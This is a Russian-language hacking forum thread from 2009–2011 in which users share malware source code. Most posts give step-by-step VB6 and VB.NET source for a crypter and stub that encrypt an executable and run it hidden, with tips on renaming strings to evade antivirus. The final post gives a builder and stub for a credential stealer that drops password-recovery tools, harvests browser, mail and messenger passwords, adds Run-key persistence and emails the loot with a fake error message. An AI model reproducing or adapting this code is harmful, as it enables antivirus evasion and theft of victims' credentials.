Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Околотематические разделы > Для разработчиков > Программирование
CHAT Регистрация Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Ответ
 
Опции темы
Старый 15.10.2009, 17:20   #1
KollinZ
professional 
 
Аватар для KollinZ
 
Регистрация: 09.01.2009
Сообщений: 1,833
Вес репутации: 42 KollinZ специалистKollinZ специалистKollinZ специалистKollinZ специалистKollinZ специалистKollinZ специалист
Депозит: 0$
Вы сказали Спасибо: 382
Поблагодарили 373 раз(а) в 233 сообщениях
[Delphi]
Исходник DSJoiner'a
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.


______________
[Delphi]
Joiner Evil Glue

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.


______________
[Delphi]
File_Joiner
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.

______________
[VB]
carb0n_crypter_1.6.7z
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.

______________
[Delphi]
Anskya Polymorphic Packer 1.3
BE 1.3
Crypter 3.1
Ex Binder 0.1
FileCrypterPro by Aphex
Open Source Code Crypter 1.0
Pecrypt
pScrambler 1.2 by p0ke
SmokesCrypter 1.2
Spider Small Binder
Super Crypt 1.0 by
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.
KollinZ вне форума   Ответить с цитированием
Благодарности KollinZ от:
Старый 29.09.2010, 18:35   #2
leh12
advanced 
 
Аватар для leh12
 
Регистрация: 26.10.2008
Сообщений: 429
Вес репутации: 10 leh12 знатокleh12 знаток
Депозит: 0$
Вы сказали Спасибо: 26
Поблагодарили 80 раз(а) в 53 сообщениях
просто 1 -текст бокс .кнопка (выбора файла).И кнопка КРИПТ.+ Коммон диалог-ВСЕ .Криптуем в RC4
-----------------криптор для изучения..-------------
Private Sub cmdBrowse_Click()
cmdlg.ShowOpen 'Executes the open file dialog
txtFile.Text = cmdlg.FileName 'Sets the .text property of txtFile to the filepath and name of the file opened
End Sub

Private Sub cmdCrypt_Click()
Dim sStub As String, sFile As String 'Variables to load stub/file to be crypted in

Open App.Path & "\stub.exe" For Binary As #1 'opens the stub
sStub = Space(LOF(1)) 'makes variable a space that is the lof(length of file)
Get #1, , sStub 'imports into our variable
Close #1 'close the stub

Open txtFile.Text For Binary As #1 'opens the file to be crypted
sFile = Space(LOF(1)) 'makes variable space that is lof
Get #1, , sFile 'imports into variable
Close #1 'close file

sFile = RC4(sFile, "password") 'encrypts the string "sFile", which is the file we want crypted - you can use any password, or generate one

Open App.Path & "\crypted.exe" For Binary As #1 'opens for output
Put #1, , sStub 'puts our stub
Put #1, , "#^#^#" 'random string so we can split it up and decrypt the file in stub
Put #1, , sFile 'puts our encrypted file
Close #1 'closes file

MsgBox "File Crypted", vbInformation, "Success!" 'self explanatory =]
End Sub

Public Function RC4(ByVal Data As String, ByVal Password As String) As String 'rc4 encryption function
On Error Resume Next
Dim F(0 To 255) As Integer, X, Y As Long, Key() As Byte
Key() = StrConv(Password, vbFromUnicode)
For X = 0 To 255
Y = (Y + F(X) + Key(X Mod Len(Password))) Mod 256
F(X) = X
Next X
Key() = StrConv(Data, vbFromUnicode)
For X = 0 To Len(Data)
Y = (Y + F(Y) + 1) Mod 256
Key(X) = Key(X) Xor F(Temp + F((Y + F(Y)) Mod 254))
Next X
RC4 = StrConv(Key, vbUnicode)
End Function
-----------------------------------------------------------------------------
Теперь делаем СТАБ--------------------------
----------------------------------------------
Sub Main()
Dim sFile As String 'Variable to load file into
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'opens this exe
sFile = Space(LOF(1)) 'makes variable space that is lof
Get #1, , sFile 'imports into var
Close #1 'closes this exe, not end :0

sFile = Split(sFile, "#^#^#")(1) 'remember putting in the random string? this is so we can get the actual file/data that was added to the stub(crypted file)
sFile = RC4(sFile, "password") 'decrypts this file (RC4 is the same for encryption and decryption as long as the pass is the same)

Open App.Path & "\uncrypted.exe" For Binary As #1 'opens file to put decrypted file
Put #1, , sFile 'puts decrypted file
Close #1 'closes file

Shell App.Path & "\uncrypted.exe", vbHide 'runs file hidden
End Sub

Public Function RC4(ByVal Data As String, ByVal Password As String) As String 'rc4 encryption function
On Error Resume Next
Dim F(0 To 255) As Integer, X, Y As Long, Key() As Byte
Key() = StrConv(Password, vbFromUnicode)
For X = 0 To 255
Y = (Y + F(X) + Key(X Mod Len(Password))) Mod 256
F(X) = X
Next X
Key() = StrConv(Data, vbFromUnicode)
For X = 0 To Len(Data)
Y = (Y + F(Y) + 1) Mod 256
Key(X) = Key(X) Xor F(Temp + F((Y + F(Y)) Mod 254))
Next X
RC4 = StrConv(Key, vbUnicode)
End Function

-----------------------------------------------------------
УСЕ


------------------------------------------------------------------------------------------------
leh12 вне форума   Ответить с цитированием
Благодарности: 2
Старый 29.09.2010, 19:49   #3
Zimper
intermediate 
 
Аватар для Zimper
 
Регистрация: 12.04.2008
Сообщений: 740
Вес репутации: 22 Zimper специалистZimper специалистZimper специалистZimper специалистZimper специалистZimper специалистZimper специалист
Депозит: 0$
Вы сказали Спасибо: 28
Поблагодарили 346 раз(а) в 167 сообщениях
Блина,я Вб уже забыл,а нету перевода на приплюснутом?Тема очень интересная.

добавлено через 17 минут
Лан буду сам разбираться

Последний раз редактировалось Zimper, 29.09.2010 в 20:06. Причина: Добавлено сообщение
Zimper вне форума   Ответить с цитированием
Старый 06.10.2010, 13:36   #4
leh12
advanced 
 
Аватар для leh12
 
Регистрация: 26.10.2008
Сообщений: 429
Вес репутации: 10 leh12 знатокleh12 знаток
Депозит: 0$
Вы сказали Спасибо: 26
Поблагодарили 80 раз(а) в 53 сообщениях
Все работает..-меняем под себя (sFile) тагже пароль..Какие варианты получатся выкладываем в раздел ХАК ПРОГРЫММЫ ( Ну если хотим конечно)
Есть вариант Визуал студия 2010... сразу говорю что то гдето напортачил- может кто и подскажет..
----------------------------------------------------------------------
Обьявы---------
Imports System.Security.Cryptography
Imports System.IO
Imports System.Text
Imports System.Runtime.InteropServices
--------------------
форма1---
Public Class Form1
Dim Infectedfile, stub As String
---------------
кнопка 1 (обзор)
With OpenFileDialog1
.FileName = ""
.Filter = "Exelcutable(*.exe)|*.exe*"
.Title = "Leh12 Crypter"
.ShowDialog()
TextBox1.Text = .FileName
Infectedfile = TextBox1.Text
End With
end Sab
-------------------
кнопка2 (шифруем )
Dim key As String = "3sdng3nkd2r4ytuj"
Dim Split As String = "3rerttr5ytfhr"
Dim Cryptfile As String
FileOpen(1, ("stub.exe"), OpenMode.Binary)
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)
FileOpen(1, (TextBox1.Text), OpenMode.Binary)
Infectedfile = Space(LOF(1)) ' Название файла
FileGet(1, Infectedfile)
FileClose(1)
Cryptfile = Infectedfile
Dim oAesProvider As New RijndaelManaged
Dim btClear() As Byte

Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}
Dim oKeyGenerator As New Rfc2898DeriveBytes(key, btSalt)

oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

Dim ms As New IO.MemoryStream
Dim cs As New CryptoStream(ms, _
oAesProvider.CreateEncryptor((( _
CryptoStreamMode.Write)
btClear = System.Text.Encoding.UTF8.GetBytes(Cryptfile)
cs.Write(btClear, 0, btClear.Length)
cs.Close()

Cryptfile = Convert.ToBase64String(ms.ToArray)
FileOpen(1, (TextBox1.Text & "-Crypted.exe"), OpenMode.Binary)
FilePut(1, stub)
FilePut(1, Split)
FilePut(1, Cryptfile)
FilePut(1, Split)
FileClose(1)
MsgBox("Подождите!")
MsgBox("ЗАШИФРОВАН", MsgBoxStyle.Information, "Information")
End Sub
------------------------------
Тамже и код ---------
Public Shared Function StrToByteArray(ByVal str As String) As Byte()
Dim encoding As New System.Text.ASCIIEncoding()
Return encoding.GetBytes(str)
End Function
Private Declare Sub CopyMemory Lib "kerne132" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Sourse As Long, ByVal Length As Long)
Function GetEDF(ByVal Path As String) As Long
Dim ByteArray() As Byte
Dim PE As Long, NumberOfSections As Integer
Dim BeginLastSection As Long
Dim RawSize As Long, RawOffset As Long

FileOpen(10, Path, OpenMode.Binary, OpenAccess.Default)
ReDim ByteArray(LOF(10) - 1)
FileGet(10, ByteArray)
FileClose(10)


Call CopyMemory(PE, ByteArray(&H3C), 4)
Call CopyMemory(NumberOfSections, ByteArray(PE + &H6), 2)
BeginLastSection = PE + &HF8 + ((NumberOfSections - 1) * &H28)
Call CopyMemory(RawSize, ByteArray(BeginLastSection + 16), 4)
Call CopyMemory(RawOffset, ByteArray(BeginLastSection + 20), 4)
GetEDF = RawSize + RawOffset
End Function

End Class
--------------------------

Последний раз редактировалось leh12, 06.10.2010 в 13:59. Причина: добавление
leh12 вне форума   Ответить с цитированием
Старый 22.10.2010, 09:52   #5
leh12
advanced 
 
Аватар для leh12
 
Регистрация: 26.10.2008
Сообщений: 429
Вес репутации: 10 leh12 знатокleh12 знаток
Депозит: 0$
Вы сказали Спасибо: 26
Поблагодарили 80 раз(а) в 53 сообщениях
Кто занимается кодингом делюсь - дабо не рыть инет..
ВБ.. Кодирование и декодирование :
blowfish.rc4.gost.tea.xor.skipgjack.twofish.
http://multi-up.com/360233
leh12 вне форума   Ответить с цитированием
Старый 17.12.2010, 09:33   #6
leh12
advanced 
 
Аватар для leh12
 
Регистрация: 26.10.2008
Сообщений: 429
Вес репутации: 10 leh12 знатокleh12 знаток
Депозит: 0$
Вы сказали Спасибо: 26
Поблагодарили 80 раз(а) в 53 сообщениях
Всем привет..
Кодирование на VB .NeT.- немного отличается от ВБ-6 . Поэтому придется все заного..
Качаем ВБ Студию ( у меня 2010) -желательно с майкрософт.
Кто вообще в первый раз ее увидел .- Как делать кнопки и тд. смотрим тут-
http://www.youtube.com/watch?v=ZHPcW...eature=related
Тагже советую в гугле найти уроки по ВБ - прочитать из чего состоит код.
Создаем проект - называем (как хотим)
Откроется форма. Далее Как на видео Пихаем -TextBox1 - Button1- Button2
Далее Добавляем SaveFileDialog1 and OpenFileDialog1 and ToolTip1...Все .Обгрейдите сами потом в разные краски и тд и тп...Переходим к коду.Кликаете 2 раза на форму
Тут немного лишнего ну несуть.-добавляем что у вас нехватает..
--------------------------------

Imports System.Drawing.Imaging
Imports Microsoft.Win32
Imports System.Text
Public Class Form1
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Integer)
Declare Function ExtractIcon Lib "shell32.dll" Alias "ExtractIconExA" (ByVal lpszFile As String, ByVal nIconIndex As Integer, ByRef phiconLarge As Integer, ByRef phiconSmall As Integer, ByVal nIcons As Integer) As Integer
Const filesplit = "@жопановыйгод@"
Dim stub, virus, save As String
Dim anubis, sandbox, vbox, vmware, vpc, wireshark, nod, zone, norman, bitd, malware, _
ollydbug As Boolean
--------------
Это все Обьявления Прочитаете про них На уроках по ВБ.
Далее кликаем по кнопке 1 - 2 раза
--------------------------------------
With OpenFileDialog1
.FileName = ""
.Filter = "Exelcutable(*.exe)|*.exe*"
.ShowDialog()

TextBox1.Text = .FileName

End With
===========================
Да код пихаем между.
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
- СЮДА-
End Sub
Далее кликаем по кнопке2
-----------
Dim filein, filename, stub As String
Dim lol As New SaveFileDialog
If lol.ShowDialog = Windows.Forms.DialogResult.OK Then
filename = lol.FileName
Else : Exit Sub
End If
FileOpen(1, TextBox1.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
filein = Space(LOF(1))
FileGet(1, filein)
FileClose(1)
FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)
FileOpen(1, filename, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, stub & filesplit & rc4(filein, "жопановыйгод"))
FileClose(1)

MsgBox("Зашифрован!")
Me.Close()
-------------------------------------------------------
Осталось только добавить код шифрования в RC4 (код Дешифрования добавим в Стаб
----------------------------
Public Shared Function rc4(ByVal message As String, ByVal password As String) As String
Dim i As Integer = 0
Dim j As Integer = 0
Dim cipher As New StringBuilder
Dim returnCipher As String = String.Empty
Dim sbox As Integer() = New Integer(256) {}
Dim key As Integer() = New Integer(256) {}
Dim intLength As Integer = password.Length
Dim a As Integer = 0
While a <= 255
Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0))
key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
sbox(a) = a
System.Math.Max(System.Threading.Interlocked.Incre ment(a), a - 1)
End While
Dim x As Integer = 0
Dim b As Integer = 0
While b <= 255
x = (x + sbox(b) + key(b)) Mod 256
Dim tempSwap As Integer = sbox(b)
sbox(b) = sbox(x)
sbox(x) = tempSwap
System.Math.Max(System.Threading.Interlocked.Incre ment(b), b - 1)
End While
a = 1
While a <= message.Length
Dim itmp As Integer = 0
i = (i + 1) Mod 256
j = (j + sbox(i)) Mod 256
itmp = sbox(i)
sbox(i) = sbox(j)
sbox(j) = itmp
Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)
Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)
itmp = Asc(ctmp)
Dim cipherby As Integer = itmp Xor k
cipher.Append(Chr(cipherby))
System.Math.Max(System.Threading.Interlocked.Incre ment(a), a - 1)
End While
returnCipher = cipher.ToString
cipher.Length = 0
Return returnCipher
End Function
-----------------------------------------------------
Компилируем - проверяем на ошибки ( Зеленая стрелка сверху Студии)Если все норм. То в свойствах можно добавить иконку и обгрейдить как хотим..
Сохроняем ( и запоминаем куда)Далее создаем новый проект Называем Стаб -ваш 1проект
Здесь все проще без кнопак..Кликаем по форме 2 раза.
-------------------------------
Imports System.Text
Public Class Form1
Const filesplit = "@жопановыйгод@"
--------------------------------
Добавляем что нехватает
-------------------------------------
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
Dim TPath As String = System.IO.Path.GetTempPath
Dim file1, filezb4(), filezafter As String
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
file1 = Space(LOF(1))
FileGet(1, file1)
FileClose(1)
filezb4 = Split(file1, filesplit)
filezafter = rc4(filezb4(1), "жопановыйгод")
FileOpen(1, TPath & "\Crypted.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, filezafter)
FileClose(1)
System.Diagnostics.Process.Start(TPath & "\Crypted.exe")
Me.Close()
End
End Sub
-----------------------------------------
Я так понял вы догадались что не все надо добавлять ..Т.К .Private Sub Form1_Load .....и End Sub у вас свое есть...
Вот эта часть что описал сверху можно и нужно изменять дабы не палилось АВ.Тут все варианты хороши (Можно зайти на WWW.RND.ORG и сгенирировать и поменять к примеру - filezafter на qwdfengerg во всем коде ну и так совсеми поступить Главное непереборщить..Далее код дешифровки это полностью копируем
-------------
Public Shared Function rc4(ByVal message As String, ByVal password As String) As String
Dim i As Integer = 0
Dim j As Integer = 0
Dim cipher As New StringBuilder
Dim returnCipher As String = String.Empty
Dim sbox As Integer() = New Integer(256) {}
Dim key As Integer() = New Integer(256) {}
Dim intLength As Integer = password.Length
Dim a As Integer = 0
While a <= 255
Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0))
key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
sbox(a) = a
System.Math.Max(System.Threading.Interlocked.Incre ment(a), a - 1)
End While
Dim x As Integer = 0
Dim b As Integer = 0
While b <= 255
x = (x + sbox(b) + key(b)) Mod 256
Dim tempSwap As Integer = sbox(b)
sbox(b) = sbox(x)
sbox(x) = tempSwap
System.Math.Max(System.Threading.Interlocked.Incre ment(b), b - 1)
End While
a = 1
While a <= message.Length
Dim itmp As Integer = 0
i = (i + 1) Mod 256
j = (j + sbox(i)) Mod 256
itmp = sbox(i)
sbox(i) = sbox(j)
sbox(j) = itmp
Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)
Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)
itmp = Asc(ctmp)
Dim cipherby As Integer = itmp Xor k
cipher.Append(Chr(cipherby))
System.Math.Max(System.Threading.Interlocked.Incre ment(a), a - 1)
End While
returnCipher = cipher.ToString
cipher.Length = 0
Return returnCipher
End Function
--------------------------------------------
В конце должно остаться END CLASS
В заключении Константа - жопановыйгод - может быть любая -это пароль на шифровку но она должна быть одинакова что в крипторе что в стабе..
Тагже в свойствах меняем иконку . название продукта и тд. Сохраняем . Переменовываем файл на Stub.exe копируем и встовляем рядом с криптором (кстате Stub.exe можно тоже поменять на vasja.exe но это догадаетесь сами когда код будите изучать)
Ну вроде и все..Шифрование тагже можно менять .Будут вопросы - отвечу...
leh12 вне форума   Ответить с цитированием
Благодарности: 3
Старый 22.12.2010, 13:16   #7
leh12
advanced 
 
Аватар для leh12
 
Регистрация: 26.10.2008
Сообщений: 429
Вес репутации: 10 leh12 знатокleh12 знаток
Депозит: 0$
Вы сказали Спасибо: 26
Поблагодарили 80 раз(а) в 53 сообщениях
RC 4 - у иностранцев гораз запаленый ( но этот код хорошь что его можно сжимать и резать всякими пакероми всеравно будет работать.)..но хочу сказать что можно менять так называемые String и коде RC4/ Для упращения (кто не знает) В студии открываем ПРАВКУ>CTRL- H (быстрая замена)Там пишем что найти ( к примеру как KEY и вводим поменять все на Ertfgvjbdjflknlrtkh. Студия напишет что 4 (к примеру ) поменял.
И тд.
Далее опишу код XOR - на VB-net//
Вместо RC4 будем шифровать в XOR
Что надо .Да впринципе ничего Код Криптора остается темже только меняем Функцию шифра и в стабе дешифра..Начинаем с того что надо поменять в Крипторе эту строку
FilePut(1, stub & filesplit & rc4(filein, "жопановыйгод"))
на
FilePut(1, stub & filesplit &XOREncryption ("жопановыйгод", filein)
Тобишь поменяли файл с паролем местами и нзвание функции.
код.
Public Function XOREncryption(ByVal CodeKey As String, ByVal DataIn As String) As String
Dim lonDataPtr As Long
Dim strDataOut As String
Dim temp As Integer
Dim tempstring As String
Dim intXOrValue1 As Integer
Dim intXOrValue2 As Integer
For lonDataPtr = 1 To Len(DataIn)
intXOrValue1 = Asc(Mid$(DataIn, lonDataPtr, 1))
'The second value comes from the code key
intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
temp = (intXOrValue1 Xor intXOrValue2)
tempstring = Hex(temp)
If Len(tempstring) = 1 Then tempstring = "0" & tempstring
strDataOut = strDataOut + tempstring
Next lonDataPtr
XOREncryption = strDataOut
End Function
----------------------------------------------------
Далее в стабе тагже ..
filezafter = rc4(filezb4(1), "жопановыйгод") - Меняем на..-
filezafter =XORDecryption("жопановыйгод", filezb4(1))
Код.
Public Function XORDecryption(ByVal CodeKey As String, ByVal DataIn As String) As String
Dim lonDataPtr As Long
Dim strDataOut As String
Dim intXOrValue1 As Integer
Dim intXOrValue2 As Integer
For lonDataPtr = 1 To (Len(DataIn) / 2)
intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
Next lonDataPtr
XORDecryption = strDataOut
End Function
--------------------------------------------------
ВсЕ..Этот Алгоритм не так палится А при обрезании PE compaktom вообще перестает палиться . Как и показывал в теме Крипторы.Тагже можно менять все стринги и т.д
leh12 вне форума   Ответить с цитированием
Старый 23.12.2010, 00:14   #8
KollinZ
professional 
 
Аватар для KollinZ
 
Регистрация: 09.01.2009
Сообщений: 1,833
Вес репутации: 42 KollinZ специалистKollinZ специалистKollinZ специалистKollinZ специалистKollinZ специалистKollinZ специалист
Депозит: 0$
Вы сказали Спасибо: 382
Поблагодарили 373 раз(а) в 233 сообщениях
Цитата:
Сообщение от leh12 Посмотреть сообщение
ВсЕ..Этот Алгоритм не так палится А при обрезании PE compaktom вообще перестает палиться . Как и показывал в теме Крипторы.Тагже можно менять все стринги и т.д
под с++ бы
KollinZ вне форума   Ответить с цитированием
Старый 23.12.2010, 13:11   #9
leh12
advanced 
 
Аватар для leh12
 
Регистрация: 26.10.2008
Сообщений: 429
Вес репутации: 10 leh12 знатокleh12 знаток
Депозит: 0$
Вы сказали Спасибо: 26
Поблагодарили 80 раз(а) в 53 сообщениях
СИ- парни нету ..Выкладываю исходы VB.NET.
http://multi-up.com/399527
пароль - 123
Тем кто занялся програмированием на вб.нет
leh12 вне форума   Ответить с цитированием
Благодарности leh12 от:
Старый 04.01.2011, 15:49   #10
leh12
advanced 
 
Аватар для leh12
 
Регистрация: 26.10.2008
Сообщений: 429
Вес репутации: 10 leh12 знатокleh12 знаток
Депозит: 0$
Вы сказали Спасибо: 26
Поблагодарили 80 раз(а) в 53 сообщениях
Привет всем ..Расскажу как сделать билдер ( так его обзавем)на вб нет..
Что нужно..
3 текст бокса Плюс кнопка..( это билд будет.)
Текст боксы понятно будут :
МЫЛО . ПАСС. КОМУ ШЛЕМ - ОТЧЕТ ( отсылать будем через SMTP)
КОД:
Imports System.Net.Mail
Imports System.IO
Public Class Form1----Но это у вас свое должно быть
Dim stub, text1, text2, Text3 As String
Const FileSplit = "asfghrty"----Тагже как и в крипторе Константа должна быть одинакова что тут что в Стабе...
Жмем 2 клика на кнопку ОДИН и пишем следующий код..

Text3 = TextBox3.Text
text1 = TextBox1.Text
text2 = TextBox2.Text
Try
FileOpen(1, Application.StartupPath + "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)

If File.Exists(Application.StartupPath + "\Server.exe") Then
My.Computer.FileSystem.DeleteFile(Application.Star tupPath + "\Server.exe")
End If
FileOpen(1, Application.StartupPath + "\Server.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, stub & FileSplit & text1 & FileSplit & text2 & FileSplit & Text3)
FileClose(1)
MsgBox("Server made successfully", MsgBoxStyle.OkOnly, "Success")
Catch ex As Exception
End Try
End Sub
-----------------------------------------готово---Пишем Стаб

Добавляем 3 текст бокса (2-мыло с пасом (2 и 3 ) и 1 будет писемце))
код..
Imports System.Net.Mail
Imports System.IO
ImportsPublic Class Form1
Dim Stub, text1, text2, text3 As String
Dim settings(), user, pass As String
Const FileSplit = "asfghrty"
Function DialUpPWshow() As String
Dim open As String
Dim Ressource1() As Byte = My.Resources.Dialupass
FileOpen(1, Environ("tmp") & "\dialup.exe", OpenMode.Binary)
FilePut(1, Ressource1)
FileClose(1)
Shell(Environ("tmp") & "\dialup.exe /stext " & Environ("tmp") & "\data.txt", AppWinStyle.Hide)
open = IO.File.ReadAllText(Environ("tmp") & "\data.txt")
Return open
End Function
' ==========MADE BY 5416339 for www.hackmeout.com============Other stealers can be added with the help of www.nirsoft.com
Function IE() As String
Dim open As String
Dim Ressource1() As Byte = My.Resources.iepv
FileOpen(1, Environ("tmp") & "\iepv.exe", OpenMode.Binary)
FilePut(1, Ressource1)
FileClose(1)
Shell(Environ("tmp") & "\iepv.exe /stext " & Environ("tmp") & "\iepv.txt", AppWinStyle.Hide)
open = IO.File.ReadAllText(Environ("tmp") & "\iepv.txt")
Return open
End Function
Function mess() As String
Dim open As String
Dim Ressource1() As Byte = My.Resources.mspass
FileOpen(1, Environ("tmp") & "\mspass.exe", OpenMode.Binary)
FilePut(1, Ressource1)
FileClose(1)
Shell(Environ("tmp") & "\mspass.exe /stext " & Environ("tmp") & "\mess.txt", AppWinStyle.Hide)
open = IO.File.ReadAllText(Environ("tmp") & "\mess.txt")
Return open
End Function

Function chrome() As String
Dim open As String
Dim Ressource1() As Byte = My.Resources.ChromePass
FileOpen(1, Environ("tmp") & "\ChromePass.exe", OpenMode.Binary)
FilePut(1, Ressource1)
FileClose(1)
Shell(Environ("tmp") & "\ChromePass.exe /stext " & Environ("tmp") & "\ChromePass.txt", AppWinStyle.Hide)
open = IO.File.ReadAllText(Environ("tmp") & "\ChromePass.txt")
Return open
End Function
Function opera() As String
Dim open As String
Dim Ressource1() As Byte = My.Resources.OperaPassView
FileOpen(1, Environ("tmp") & "\OperaPassView.exe", OpenMode.Binary)
FilePut(1, Ressource1)
FileClose(1)
Shell(Environ("tmp") & "\OperaPassView.exe /stext " & Environ("tmp") & "\OperaPassView.txt", AppWinStyle.Hide)
open = IO.File.ReadAllText(Environ("tmp") & "\OperaPassView.txt")
Return open
End Function
Function pspv() As String
Dim open As String
Dim Ressource1() As Byte = My.Resources.pspv
FileOpen(1, Environ("tmp") & "\pspv.exe", OpenMode.Binary)
FilePut(1, Ressource1)
FileClose(1)
Shell(Environ("tmp") & "\pspv.exe /stext " & Environ("tmp") & "\pspv.txt", AppWinStyle.Hide)
open = IO.File.ReadAllText(Environ("tmp") & "\pspv.txt")
Return open
End Function
Function produkey() As String
Dim open As String
Dim Ressource1() As Byte = My.Resources.produkey
FileOpen(1, Environ("tmp") & "\produkey.exe", OpenMode.Binary)
FilePut(1, Ressource1)
FileClose(1)
Shell(Environ("tmp") & "\produkey.exe /stext " & Environ("tmp") & "\produkey.txt", AppWinStyle.Hide)
open = IO.File.ReadAllText(Environ("tmp") & "\produkey.txt")
Return open
End Function
Function mailpv() As String
Dim open As String
Dim Ressource1() As Byte = My.Resources.mailpv
FileOpen(1, Environ("tmp") & "\mailpv.exe", OpenMode.Binary)
FilePut(1, Ressource1)
FileClose(1)
Shell(Environ("tmp") & "\mailpv.exe /stext " & Environ("tmp") & "\mailpv.txt", AppWinStyle.Hide)
open = IO.File.ReadAllText(Environ("tmp") & "\mailpv.txt")
Return open
End Function
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Me.Visible = False
Me.Hide()
Try
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
text1 = Space(LOF(1))
text2 = Space(LOF(1))
FileGet(1, text1) ' options(1)
FileGet(1, text2) ' options(2)
FileGet(1, text3)
FileClose(1)
settings = Split(text1, FileSplit)

TextBox2.Text = settings(1)
TextBox3.Text = settings(2)
TextBox4.Text = settings(3)
Catch ex As Exception
End Try
Me.ShowInTaskbar = False
Me.ShowIcon = False
Me.Opacity = 0


Dim nl As String = vbNewLine
Dim MailSetup As New MailMessage
My.Computer.Registry.LocalMachine.OpenSubKey("SOFT WARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue(Application.ProductName, Application.ExecutablePath)

Call DialUpPWshow()
Call mess()
Call IE()
Call chrome()
Call opera()
Call pspv()
Call produkey()
Call mailpv()
TextBox1.Text = IO.File.ReadAllText(Environ("tmp") & "\data.txt") _
& IO.File.ReadAllText(Environ("tmp") & "\mess.txt") _
& IO.File.ReadAllText(Environ("tmp") & "\iepv.txt") _
& IO.File.ReadAllText(Environ("tmp") & "\OperaPassView.txt") _
& IO.File.ReadAllText(Environ("tmp") & "\pspv.txt") _
& IO.File.ReadAllText(Environ("tmp") & "\produkey.txt") _
& IO.File.ReadAllText(Environ("tmp") & "\mailpv.txt") _
& IO.File.ReadAllText(Environ("tmp") & "\ChromePass.txt")

Dim MyMailMessage As New MailMessage()
Dim WC As New System.Net.WebClient
MyMailMessage.From = New MailAddress(TextBox2.Text)
MyMailMessage.To.Add(TextBox4.Text)
MyMailMessage.Subject = ("Привет:" & System.Text.Encoding.ASCII.GetString((WC.DownloadD ata("http://www.whatismyip.com/automation/n09230945.asp"))))
WC.Dispose()
MyMailMessage.Body = (TextBox1.Text)
Dim SMTPServer As New SmtpClient("smtp.mail.ru")
SMTPServer.Port = 25
SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox2.Text, TextBox3.Text)
SMTPServer.EnableSsl = True
SMTPServer.Send(MyMailMessage)

Me.Hide()
MsgBox("Please Download an install .Net Framework 8.0 ", MsgBoxStyle.Exclamation, "Error")
Exit Sub
Me.Close()
End
End Sub

End Class Microsoft.Win32
------------------------------------------------------
ну типо что то такого...
Да .Скажите где взять эти Эксешки и как их добавить.?-Хороший вопрос..В проекте открываем СВОЙСТВА - РЕСУРСЫ(создастся папка) ну и добавляем эксели (незабываем убрать галку- ВСЕ ФАЙЛЫ)
А вот и файлики
http://multi-up.com/406100
Вроде все правельно отписал .Все это работает и выложено в хак прогах.Если что то не так - пишите (всетаки новый год)

добавлено через 59 минут
VB NET
Если мы захочим изменить цвет в Процессбаре то качаем эту Дллку и вставляем в колорДиалог .. Будет кроме зеленого и голубой и красный на выбор..
http://multi-up.com/406133
И еще хотел сказать что есть конверторы кодов Vbnet В СИ++ и тд..

Последний раз редактировалось leh12, 04.01.2011 в 17:05. Причина: Добавлено сообщение
leh12 вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
